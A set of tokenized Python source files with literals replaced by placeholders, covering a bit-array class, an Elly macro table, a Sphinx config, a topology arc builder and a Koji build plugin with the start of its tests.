<s> """<STR_LIT>""" <EOL> import array <EOL> hxh = { '<STR_LIT:0>' : <NUM_LIT:0> , '<STR_LIT:1>' : <NUM_LIT:1> , '<STR_LIT:2>' : <NUM_LIT:2> , '<STR_LIT:3>' : <NUM_LIT:3> , '<STR_LIT:4>' : <NUM_LIT:4> , <EOL> '<STR_LIT:5>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT:A>' : <NUM_LIT:10> , '<STR_LIT:B>' : <NUM_LIT:11> , '<STR_LIT:C>' : <NUM_LIT:12> , <EOL> '<STR_LIT:D>' : <NUM_LIT> , '<STR_LIT:E>' : <NUM_LIT> , '<STR_LIT:F>' : <NUM_LIT:15> <EOL> } <EOL> hxd = u'<STR_LIT>' <EOL> sel = [ <NUM_LIT:0> <NUM_LIT:200> , <NUM_LIT:0> <NUM_LIT:100> , <NUM_LIT> <NUM_LIT> , <NUM_LIT> <NUM_LIT:20> , <NUM_LIT> <NUM_LIT:10> , <NUM_LIT> <NUM_LIT:4> , <NUM_LIT> <NUM_LIT:2> , <NUM_LIT> <NUM_LIT:1> ] <EOL> N = len ( sel ) <EOL> nB = <NUM_LIT:2> <EOL> def _com ( x ) : return ( <NUM_LIT:255> - x ) <EOL> def getByteCountFor ( nbc ) : <EOL> """<STR_LIT>""" <EOL> n , m = divmod ( nbc , N ) <EOL> if m > <NUM_LIT:0> : n += <NUM_LIT:1> <EOL> return n <EOL> def join ( a , b ) : <EOL> """<STR_LIT>""" <EOL> return a . data + b . data <EOL> def check ( bs , ps ) : <EOL> """<STR_LIT>""" <EOL> n = len ( bs ) <EOL> for i in range ( n ) : <EOL> if ( bs [ i ] & ps [ i ] ) != <NUM_LIT:0> : return False <EOL> return True <EOL> def show ( bs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return '<STR_LIT:U+0020>' . join ( map ( lambda b : '<STR_LIT>' . format ( b ) , bs ) ) <EOL> except ValueError : <EOL> return '<STR_LIT>' <EOL> class EllyBits ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nob = nB * N ) : <EOL> """<STR_LIT>""" <EOL> n = getByteCountFor ( nob ) <EOL> self . data = array . array ( '<STR_LIT:B>' , ( <NUM_LIT:0> , ) * n ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' + show ( self . data ) <EOL> def set ( self , k ) : <EOL> """<STR_LIT>""" <EOL> n , m = divmod ( k , N ) <EOL> if n >= len ( self . data ) : return <EOL> self . 
data [ n ] |= sel [ m ] <EOL> def test ( self , k ) : <EOL> """<STR_LIT>""" <EOL> n , m = divmod ( k , N ) <EOL> if n >= len ( self . data ) : return False <EOL> return ( self . data [ n ] & sel [ m ] ) != <NUM_LIT:0> <EOL> def match ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> if _com ( self . data [ i ] ) & r . data [ i ] != <NUM_LIT:0> : return False <EOL> return True <EOL> def equal ( self , r ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( r . data ) ) : <EOL> if self . data [ i ] != r . data [ i ] : return False <EOL> return True <EOL> def intersect ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> if self . data [ i ] & r . data [ i ] != <NUM_LIT:0> : return True <EOL> return False <EOL> def zeroed ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . data ) ) : <EOL> if self . data [ i ] != <NUM_LIT:0> : return False <EOL> return True <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . data ) ) : self . data [ i ] = <NUM_LIT:0> <EOL> def complement ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . data ) ) : self . data [ i ] = _com ( self . data [ i ] ) <EOL> def combine ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> self . data [ i ] |= r . data [ i ] <EOL> def reset ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> self . data [ i ] &= r . data [ i ] <EOL> def compound ( self ) : <EOL> """<STR_LIT>""" <EOL> cm = map ( lambda x : _com ( x ) , self . data ) <EOL> return array . array ( '<STR_LIT:B>' , cm ) + self . 
data <EOL> def hexadecimal ( self , divide = True ) : <EOL> """<STR_LIT>""" <EOL> bs = [ ] <EOL> for b in self . data : <EOL> n , m = divmod ( b , <NUM_LIT:16> ) <EOL> bs . append ( hxd [ n ] ) <EOL> bs . append ( hxd [ m ] ) <EOL> if divide : <EOL> bs . append ( '<STR_LIT:U+0020>' ) <EOL> return '<STR_LIT>' . join ( bs ) . rstrip ( ) <EOL> def reinit ( self , hexb ) : <EOL> """<STR_LIT>""" <EOL> ln = len ( self . data ) <EOL> if len ( hexb ) // <NUM_LIT:2> != ln : return <EOL> for i in range ( ln ) : <EOL> bs = hexb [ : <NUM_LIT:2> ] <EOL> hexb = hexb [ <NUM_LIT:2> : ] <EOL> self . data [ i ] = <NUM_LIT:16> * hxh [ bs [ <NUM_LIT:0> ] ] + hxh [ bs [ <NUM_LIT:1> ] ] <EOL> def count ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . data ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> K = <NUM_LIT:12> <EOL> bbs = EllyBits ( K ) <EOL> bbs . set ( <NUM_LIT:0> ) <EOL> bbs . set ( <NUM_LIT:6> ) <EOL> bbs . set ( <NUM_LIT:11> ) <EOL> print '<STR_LIT>' , bbs <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbt = EllyBits ( K ) <EOL> bbt . set ( <NUM_LIT:9> ) <EOL> print "<STR_LIT>" , bbt . data , "<STR_LIT>" , bbt . hexadecimal ( ) <EOL> bbs . combine ( bbt ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> print "<STR_LIT>" , bbs . test ( <NUM_LIT:9> ) <EOL> print "<STR_LIT>" , bbs . test ( <NUM_LIT:10> ) <EOL> print "<STR_LIT>" , bbs . test ( <NUM_LIT:11> ) <EOL> cbs = bbs . compound ( ) <EOL> print "<STR_LIT>" , type ( cbs ) , show ( cbs ) <EOL> pbs = EllyBits ( K ) <EOL> nbs = EllyBits ( K ) <EOL> pbs . set ( <NUM_LIT:6> ) <EOL> nbs . set ( <NUM_LIT:7> ) <EOL> print '<STR_LIT>' , pbs . hexadecimal ( ) <EOL> print '<STR_LIT>' , nbs . hexadecimal ( ) <EOL> tbs = join ( pbs , nbs ) <EOL> print "<STR_LIT>" , type ( tbs ) , show ( tbs ) <EOL> print '<STR_LIT>' , check ( cbs , tbs ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbs . 
complement ( ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbs . clear ( ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> pbs . set ( <NUM_LIT:7> ) <EOL> print '<STR_LIT>' , pbs . hexadecimal ( ) , '<STR_LIT>' , nbs . hexadecimal ( ) <EOL> print '<STR_LIT>' , pbs . equal ( nbs ) <EOL> print '<STR_LIT>' , pbs . match ( nbs ) <EOL> print '<STR_LIT>' , nbs . match ( pbs ) <EOL> nbs . set ( <NUM_LIT:6> ) <EOL> print '<STR_LIT>' , nbs . hexadecimal ( ) <EOL> print '<STR_LIT>' , pbs . equal ( nbs ) <EOL> bbs . reinit ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbs . reinit ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT:=>' , bbs . hexadecimal ( False ) <EOL> print '<STR_LIT>' <EOL> rbs = EllyBits ( K ) <EOL> rbs . reinit ( '<STR_LIT>' ) <EOL> bbs . reset ( rbs ) <EOL> print '<STR_LIT:=>' , bbs . hexadecimal ( False ) <EOL> bbs . reinit ( '<STR_LIT>' ) <EOL> print '<STR_LIT:=>' , bbs , '<STR_LIT>' , bbs . zeroed ( ) <EOL> bbs . set ( <NUM_LIT:1> ) <EOL> print '<STR_LIT:=>' , bbs , '<STR_LIT>' , bbs . zeroed ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import ellyChar <EOL> import ellyWildcard <EOL> import ellyException <EOL> import definitionLine <EOL> special = ellyWildcard . Separate <EOL> def _checkBindings ( left , right ) : <EOL> """<STR_LIT>""" <EOL> mxb = '<STR_LIT:0>' <EOL> k = <NUM_LIT:0> <EOL> l = len ( right ) <EOL> while k < l : <EOL> c = right [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c == '<STR_LIT:\\>' : <EOL> if k == l : <EOL> break <EOL> b = right [ k ] <EOL> k += <NUM_LIT:1> <EOL> if '<STR_LIT:1>' <= b and b <= '<STR_LIT>' : <EOL> if mxb < b : mxb = b <EOL> if mxb == '<STR_LIT:0>' : return True <EOL> m = int ( mxb ) <EOL> n = <NUM_LIT:0> <EOL> k = <NUM_LIT:0> <EOL> l = len ( left ) <EOL> while True : <EOL> while k < l : <EOL> c = left [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c in special : <EOL> n += <NUM_LIT:1> <EOL> elif ellyWildcard . isWild ( c ) : <EOL> if c != ellyWildcard . cEND : n += <NUM_LIT:1> <EOL> break <EOL> if k == l : <EOL> break <EOL> while k < l : <EOL> c = left [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c in special : <EOL> n += <NUM_LIT:1> <EOL> break <EOL> elif not ellyWildcard . isWild ( c ) : <EOL> break <EOL> return ( m <= n ) <EOL> def _checkExpansion ( left , right ) : <EOL> """<STR_LIT>""" <EOL> nh = <NUM_LIT:0> <EOL> n = <NUM_LIT:0> <EOL> k = <NUM_LIT:0> <EOL> l = len ( left ) <EOL> while k < l : <EOL> c = left [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c == '<STR_LIT:->' : <EOL> n += <NUM_LIT:1> <EOL> nh += <NUM_LIT:1> <EOL> elif c != '<STR_LIT:U+0020>' and c != '<STR_LIT:_>' : <EOL> if not ellyWildcard . 
isWild ( c ) : <EOL> n += <NUM_LIT:1> <EOL> mh = <NUM_LIT:0> <EOL> m = <NUM_LIT:0> <EOL> k = <NUM_LIT:0> <EOL> l = len ( right ) <EOL> while k < l : <EOL> c = right [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c == '<STR_LIT:->' : <EOL> m += <NUM_LIT:1> <EOL> mh += <NUM_LIT:1> <EOL> elif c != '<STR_LIT:U+0020>' and c != '<STR_LIT:_>' : <EOL> if k == l : <EOL> m += <NUM_LIT:1> <EOL> elif c == '<STR_LIT:\\>' : <EOL> d = right [ k ] <EOL> if '<STR_LIT:1>' > d or d > '<STR_LIT>' : <EOL> m += <NUM_LIT:1> <EOL> else : <EOL> k += <NUM_LIT:1> <EOL> else : <EOL> m += <NUM_LIT:1> <EOL> if m <= n : return True <EOL> n -= nh <EOL> m -= mh <EOL> return ( m <= n ) <EOL> class MacroTable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , defs = None , nowarn = False ) : <EOL> """<STR_LIT>""" <EOL> lim = ellyChar . Max + <NUM_LIT:11> <EOL> self . index = [ [ ] <EOL> for i in range ( lim ) ] <EOL> self . letWx = [ ] <EOL> self . digWx = [ ] <EOL> self . anyWx = [ ] <EOL> self . count = <NUM_LIT:0> <EOL> self . _errcount = <NUM_LIT:0> <EOL> if defs != None : <EOL> self . _store ( defs , nowarn ) <EOL> def _err ( self , s = '<STR_LIT>' , l = '<STR_LIT>' , d = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . _errcount += d <EOL> m = '<STR_LIT:error>' if d == <NUM_LIT:1> else '<STR_LIT>' <EOL> print >> sys . stderr , '<STR_LIT>' + m + '<STR_LIT::>' , s <EOL> if l != '<STR_LIT>' : <EOL> print >> sys . stderr , '<STR_LIT>' , l , '<STR_LIT:]>' <EOL> def getRules ( self , a ) : <EOL> """<STR_LIT>""" <EOL> if a == '<STR_LIT>' : return [ ] <EOL> if ellyChar . isLetterOrDigit ( a ) : <EOL> k = ellyChar . toIndex ( a ) <EOL> ws = self . letWx if ellyChar . isLetter ( a ) else self . digWx <EOL> ls = self . index [ k ] + ws + self . anyWx <EOL> else : <EOL> ls = self . index [ <NUM_LIT:0> ] + self . anyWx <EOL> return ls <EOL> def _store ( self , defs , nowarn ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> l = defs . 
readline ( ) <EOL> if len ( l ) == <NUM_LIT:0> : break <EOL> dl = definitionLine . DefinitionLine ( l , False ) <EOL> left = dl . left <EOL> tail = dl . tail <EOL> if left == None or tail == None : <EOL> self . _err ( l = l ) <EOL> continue <EOL> pat = ellyWildcard . convert ( left ) <EOL> if pat == None : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> pe = pat [ - <NUM_LIT:1> ] <EOL> if pe != ellyWildcard . cALL and pe != ellyWildcard . cEND : <EOL> pat += ellyWildcard . cEND <EOL> if not _checkBindings ( pat , tail ) : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> if not nowarn and not _checkExpansion ( pat , tail ) : <EOL> self . _err ( '<STR_LIT>' , l , <NUM_LIT:0> ) <EOL> if pat == None : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> r = [ pat , tail ] <EOL> c = pat [ <NUM_LIT:0> ] <EOL> p = pat <EOL> while c == ellyWildcard . cSOS : <EOL> k = p . find ( ellyWildcard . cEOS ) <EOL> if k < <NUM_LIT:0> or k == <NUM_LIT:1> : break <EOL> k += <NUM_LIT:1> <EOL> if k == len ( pat ) : break <EOL> m = ellyChar . toIndex ( pat [ <NUM_LIT:1> ] ) <EOL> self . index [ m ] . append ( r ) <EOL> p = p [ k : ] <EOL> c = p [ <NUM_LIT:0> ] <EOL> if c == ellyWildcard . cSOS : <EOL> self . _err ( l = l ) <EOL> continue <EOL> if ellyChar . isLetterOrDigit ( c ) : <EOL> m = ellyChar . toIndex ( c ) <EOL> self . index [ m ] . append ( r ) <EOL> elif ellyChar . isText ( c ) : <EOL> self . index [ <NUM_LIT:0> ] . append ( r ) <EOL> elif not c in ellyWildcard . Matching : <EOL> if c == ellyWildcard . cEND : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> print >> sys . stderr , '<STR_LIT>' , l , '<STR_LIT:]>' <EOL> else : <EOL> dc = '<STR_LIT:=>' + str ( ord ( c ) - ellyWildcard . X ) <EOL> self . _err ( '<STR_LIT>' , dc ) <EOL> continue <EOL> elif c == ellyWildcard . cANY or c == ellyWildcard . cALL : <EOL> self . anyWx . append ( r ) <EOL> elif c == ellyWildcard . cCAN : <EOL> self . index [ <NUM_LIT:0> ] . 
append ( r ) <EOL> elif c == ellyWildcard . cDIG or c == ellyWildcard . cSDG : <EOL> self . digWx . append ( r ) <EOL> elif c == ellyWildcard . cSAN : <EOL> self . digWx . append ( r ) <EOL> self . letWx . append ( r ) <EOL> elif c == ellyWildcard . cSPC or c == ellyWildcard . cEND : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> else : <EOL> self . letWx . append ( r ) <EOL> self . count += <NUM_LIT:1> <EOL> if self . _errcount > <NUM_LIT:0> : <EOL> print >> sys . stderr , '<STR_LIT>' , self . _errcount , '<STR_LIT>' <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> raise ellyException . TableFailure <EOL> def dump ( self ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' <EOL> if len ( self . index [ <NUM_LIT:0> ] ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . index [ <NUM_LIT:0> ] ) <EOL> i = <NUM_LIT:0> <EOL> for slot in self . index : <EOL> if len ( slot ) > <NUM_LIT:0> : <EOL> if i == <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT:[>' + ellyChar . toChar ( i ) + '<STR_LIT>' <EOL> _dmpall ( slot ) <EOL> i += <NUM_LIT:1> <EOL> if len ( self . letWx ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . letWx ) <EOL> if len ( self . digWx ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . digWx ) <EOL> if len ( self . anyWx ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . anyWx ) <EOL> def _dmpall ( slot ) : <EOL> """<STR_LIT>""" <EOL> for r in slot : <EOL> print u'<STR_LIT>' . format ( ellyWildcard . deconvert ( r [ <NUM_LIT:0> ] ) ) + '<STR_LIT>' , list ( r [ <NUM_LIT:1> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import substitutionBuffer <EOL> import ellyDefinitionReader <EOL> import ellyConfiguration <EOL> base = ellyConfiguration . baseSource + '<STR_LIT:/>' <EOL> name = sys . argv [ <NUM_LIT:1> ] if len ( sys . 
argv ) > <NUM_LIT:1> else '<STR_LIT:test>' <EOL> dfns = base + name + '<STR_LIT>' <EOL> print '<STR_LIT>' , dfns <EOL> inp = ellyDefinitionReader . EllyDefinitionReader ( dfns ) <EOL> if inp . error != None : <EOL> print inp . error <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> mtb = MacroTable ( inp ) <EOL> except ellyException . TableFailure : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' , mtb , '<STR_LIT>' , mtb . count , '<STR_LIT>' <EOL> if mtb . count == <NUM_LIT:0> : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> print '<STR_LIT>' <EOL> mtb . dump ( ) <EOL> sb = substitutionBuffer . SubstitutionBuffer ( mtb ) <EOL> while True : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> st = sys . stdin . readline ( ) <EOL> if len ( st ) <= <NUM_LIT:1> : break <EOL> ss = st . decode ( '<STR_LIT:utf8>' ) . strip ( ) <EOL> print '<STR_LIT>' , list ( ss ) , '<STR_LIT:(>' + str ( len ( ss ) ) + '<STR_LIT:)>' <EOL> sb . clear ( ) <EOL> sb . append ( ss ) <EOL> no = <NUM_LIT:0> <EOL> while True : <EOL> to = sb . getNext ( ) <EOL> if to == None : break <EOL> no += <NUM_LIT:1> <EOL> print '<STR_LIT>' . format ( no ) , unicode ( to ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) </s>
<s> import os <EOL> import sys <EOL> from datetime import datetime <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> from yql import __version__ as VERSION <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> source_encoding = '<STR_LIT:utf-8>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' '<STR_LIT>' '<STR_LIT>' % datetime . now ( ) . year <EOL> version = VERSION <EOL> release = VERSION <EOL> exclude_trees = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_logo = "<STR_LIT>" <EOL> html_favicon = "<STR_LIT>" <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_last_updated_fmt = '<STR_LIT>' <EOL> html_use_smartypants = True <EOL> html_use_modindex = True <EOL> html_use_index = True <EOL> html_show_sourcelink = True <EOL> html_use_opensearch = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] </s>
<s> from arcs import Arcs <EOL> from utils import point_compare , is_point , Strut , mysterious_line_test <EOL> class Line : <EOL> def __init__ ( self , Q ) : <EOL> self . arcs = Arcs ( Q ) <EOL> def arc ( self , current_arc , last = False ) : <EOL> n = len ( current_arc ) <EOL> if last and not len ( self . line_arcs ) and n == <NUM_LIT:1> : <EOL> point = current_arc [ <NUM_LIT:0> ] <EOL> index = self . arcs . get_index ( point ) <EOL> if len ( index ) : <EOL> self . line_arcs . append ( index [ <NUM_LIT:0> ] ) <EOL> else : <EOL> index . append ( self . arcs . length ) <EOL> self . line_arcs . append ( index [ <NUM_LIT:0> ] ) <EOL> self . arcs . push ( current_arc ) <EOL> elif n > <NUM_LIT:1> : <EOL> self . line_arcs . append ( self . arcs . check ( current_arc ) ) <EOL> def line ( self , points , opened ) : <EOL> self . line_arcs = [ ] ; <EOL> n = len ( points ) <EOL> current_arc = Strut ( ) <EOL> k = <NUM_LIT:0> <EOL> p = False <EOL> t = False <EOL> if not opened : <EOL> points . pop ( ) <EOL> n -= <NUM_LIT:1> <EOL> while k < n : <EOL> t = self . arcs . peak ( points [ k ] ) <EOL> if opened : <EOL> break <EOL> if p and not mysterious_line_test ( p , t ) : <EOL> tInP = all ( map ( lambda line : line in p , t ) ) <EOL> pInT = all ( map ( lambda line : line in t , p ) ) <EOL> if tInP and not pInT : <EOL> k -= <NUM_LIT:1> <EOL> break <EOL> p = t <EOL> k += <NUM_LIT:1> <EOL> if k == n and isinstance ( p , list ) and len ( p ) > <NUM_LIT:1> : <EOL> point0 = points [ <NUM_LIT:0> ] <EOL> i = <NUM_LIT:2> <EOL> k = <NUM_LIT:0> <EOL> while i < n : <EOL> point = points [ i ] ; <EOL> if point_compare ( point0 , point ) > <NUM_LIT:0> : <EOL> point0 = point <EOL> k = i <EOL> i += <NUM_LIT:1> <EOL> i = - <NUM_LIT:1> <EOL> if opened : <EOL> m = n - <NUM_LIT:1> <EOL> else : <EOL> m = n <EOL> while i < m : <EOL> i += <NUM_LIT:1> <EOL> point = points [ ( i + k ) % n ] <EOL> p = self . arcs . 
peak ( point ) <EOL> if not mysterious_line_test ( p , t ) : <EOL> tInP = all ( map ( lambda line : line in p , t ) ) <EOL> pInT = all ( map ( lambda line : line in t , p ) ) <EOL> if tInP : <EOL> current_arc . append ( point ) ; <EOL> self . arc ( current_arc ) <EOL> if not tInP and not pInT and len ( current_arc ) : <EOL> self . arc ( Strut ( [ current_arc [ - <NUM_LIT:1> ] , point ] ) ) <EOL> if pInT and len ( current_arc ) : <EOL> current_arc = Strut ( [ current_arc [ - <NUM_LIT:1> ] ] ) <EOL> else : <EOL> current_arc = Strut ( ) ; <EOL> if not len ( current_arc ) or point_compare ( current_arc [ - <NUM_LIT:1> ] , point ) : <EOL> current_arc . append ( point ) <EOL> t = p <EOL> self . arc ( current_arc , True ) <EOL> return self . line_arcs <EOL> def line_closed ( self , points ) : <EOL> return self . line ( points , False ) <EOL> def line_open ( self , points ) : <EOL> return self . line ( points , True ) <EOL> def map_func ( self , arc ) : <EOL> if len ( arc ) == <NUM_LIT:2> and type ( arc [ <NUM_LIT:0> ] ) == type ( <NUM_LIT:1> ) : <EOL> arc = [ arc ] <EOL> i = <NUM_LIT:1> <EOL> n = len ( arc ) <EOL> point = arc [ <NUM_LIT:0> ] <EOL> x1 = point [ <NUM_LIT:0> ] <EOL> x2 = dx = y2 = dy = False <EOL> y1 = point [ <NUM_LIT:1> ] <EOL> points = [ [ int ( x1 ) , int ( y1 ) ] ] <EOL> while i < n : <EOL> point = arc [ i ] <EOL> if not is_point ( point ) : <EOL> i += <NUM_LIT:1> <EOL> continue <EOL> x2 = point [ <NUM_LIT:0> ] <EOL> y2 = point [ <NUM_LIT:1> ] <EOL> dx = int ( x2 - x1 ) <EOL> dy = int ( y2 - y1 ) <EOL> if dx or dy : <EOL> points . append ( [ dx , dy ] ) <EOL> x1 = x2 <EOL> y1 = y2 <EOL> i += <NUM_LIT:1> <EOL> return points <EOL> def get_arcs ( self ) : <EOL> for num in range ( <NUM_LIT:0> , self . arcs . length ) : <EOL> yield self . map_func ( self . arcs . arcs [ str ( num ) ] ) <EOL> self . arcs . close ( ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import koji <EOL> from atomic_reactor . constants import YUM_REPOS_DIR <EOL> from atomic_reactor . plugin import PreBuildPlugin <EOL> from atomic_reactor . util import render_yum_repo <EOL> class KojiPlugin ( PreBuildPlugin ) : <EOL> key = "<STR_LIT>" <EOL> is_allowed_to_fail = False <EOL> def __init__ ( self , tasker , workflow , target , hub , root , proxy = None ) : <EOL> """<STR_LIT>""" <EOL> super ( KojiPlugin , self ) . __init__ ( tasker , workflow ) <EOL> self . target = target <EOL> self . xmlrpc = koji . ClientSession ( hub ) <EOL> self . pathinfo = koji . PathInfo ( topdir = root ) <EOL> self . proxy = proxy <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> target_info = self . xmlrpc . getBuildTarget ( self . target ) <EOL> if target_info is None : <EOL> self . log . error ( "<STR_LIT>" , self . target ) <EOL> raise RuntimeError ( "<STR_LIT>" % self . target ) <EOL> tag_info = self . xmlrpc . getTag ( target_info [ '<STR_LIT>' ] ) <EOL> repo_info = self . xmlrpc . getRepo ( tag_info [ '<STR_LIT:id>' ] ) <EOL> baseurl = self . pathinfo . repo ( repo_info [ '<STR_LIT:id>' ] , tag_info [ '<STR_LIT:name>' ] ) + "<STR_LIT>" <EOL> self . log . info ( "<STR_LIT>" , baseurl ) <EOL> repo = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' % self . target , <EOL> '<STR_LIT>' : baseurl , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> if baseurl . startswith ( "<STR_LIT>" ) : <EOL> self . log . info ( "<STR_LIT>" ) <EOL> repo [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if self . proxy : <EOL> self . log . info ( "<STR_LIT>" , self . proxy ) <EOL> repo [ '<STR_LIT>' ] = self . proxy <EOL> path = os . path . join ( YUM_REPOS_DIR , self . target + "<STR_LIT>" ) <EOL> self . log . info ( "<STR_LIT>" , path ) <EOL> self . workflow . files [ path ] = render_yum_repo ( repo , escape_dollars = False ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , unicode_literals <EOL> try : <EOL> import koji as koji <EOL> except ImportError : <EOL> import inspect <EOL> import os <EOL> import sys <EOL> import tests . koji as koji <EOL> mock_koji_path = os . path . dirname ( inspect . getfile ( koji . ClientSession ) ) <EOL> if mock_koji_path not in sys . path : <EOL> sys . path . append ( os . path . dirname ( mock_koji_path ) ) <EOL> del koji <EOL> import koji as koji <EOL> from atomic_reactor . plugins . pre_koji import KojiPlugin <EOL> from atomic_reactor . core import DockerTasker <EOL> from atomic_reactor . inner import DockerBuildWorkflow <EOL> from atomic_reactor . plugin import PreBuildPluginsRunner <EOL> from atomic_reactor . util import ImageName <EOL> from flexmock import flexmock <EOL> import pytest <EOL> from tests . constants import SOURCE , MOCK <EOL> if MOCK : <EOL> from tests . docker_mock import mock_docker <EOL> class X ( object ) : <EOL> pass <EOL> KOJI_TARGET = "<STR_LIT:target>" <EOL> GET_TARGET_RESPONSE = { "<STR_LIT>" : "<STR_LIT>" } <EOL> KOJI_TAG = "<STR_LIT>" <EOL> TAG_ID = "<STR_LIT:1>" <EOL> GET_TAG_RESPONSE = { "<STR_LIT:id>" : TAG_ID , "<STR_LIT:name>" : KOJI_TAG } <EOL> REPO_ID = "<STR_LIT:2>" <EOL> GET_REPO_RESPONSE = { "<STR_LIT:id>" : "<STR_LIT:2>" } <EOL> ROOT = "<STR_LIT>" <EOL> class MockedClientSession ( object ) : <EOL> def __init__ ( self , hub ) : <EOL> pass <EOL> def getBuildTarget ( self , target ) : <EOL> return GET_TARGET_RESPONSE <EOL> def getTag ( self , tag ) : <EOL> return GET_TAG_RESPONSE <EOL> def getRepo ( self , repo ) : <EOL> return GET_REPO_RESPONSE <EOL> class MockedPathInfo ( object ) : <EOL> def __init__ ( self , topdir = None ) : <EOL> self . topdir = topdir <EOL> def repo ( self , repo_id , name ) : <EOL> return "<STR_LIT>" . format ( self . 
